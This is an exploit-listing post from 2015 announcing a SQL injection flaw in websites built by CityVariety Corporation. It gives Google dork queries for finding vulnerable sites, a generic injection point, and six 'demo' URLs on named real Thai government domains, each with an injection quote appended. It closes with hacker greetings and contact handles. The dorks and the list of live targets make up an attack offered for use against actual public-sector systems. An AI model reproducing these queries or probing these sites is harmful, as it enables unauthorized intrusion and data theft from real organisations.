facebook facebook twitter rss

CityVariety Corporation SQL injection

Author: J0keroo , Published: 30-05-2015
# Exploit Title: CityVariety Corporation SQL injection
# Google Dork: inurl:go.th/index.php?options=photo&mode=detail&id=
inurl:go.th/index.php?options=order&mode=cate&id=
Powered by CityVariety Corporation

# Date: 29/05/2015
# Exploit Author: J0keroo (Moroccan HaxOr)
# Vendor Homepage: www.cityvariety.co.th/
# Version: All Versions
# Tested on: Linux - Windows


# Exploit : http://site.go.th/searchresult.asp?Id=[SQL Injection]


# Demo site:
http://www.kml.go.th/index.php?options=newsall&mode=detail1&id=6017'
http://www.thepcity.go.th/index.php?options=photo&mode=detail&id=1813'
http://www.baanna.go.th/index.php?options=newsall&mode=detail&id=5917'
http://www.thachi.go.th/index.php?options=newsall&mode=detail&id=5437'
http://www.thungluang.go.th/index.php?options=newsall&mode=detail&id=5917'
http://www.phuketlocal.go.th/index.php?options=news&mode=detail_rss&id=312'


# Greetz To : SQL_Master - Z0mbi3_Ma - Th3pr0 - Shell Injector - X-agent Ma - Probiltar X-WARRIOR - Thex@b1

# Contact me At : FB.com/shell.shtml - FB.com/J0keroo - J0keroo@mail.ru - Twitter.com/J0keroo

Like us on Facebook :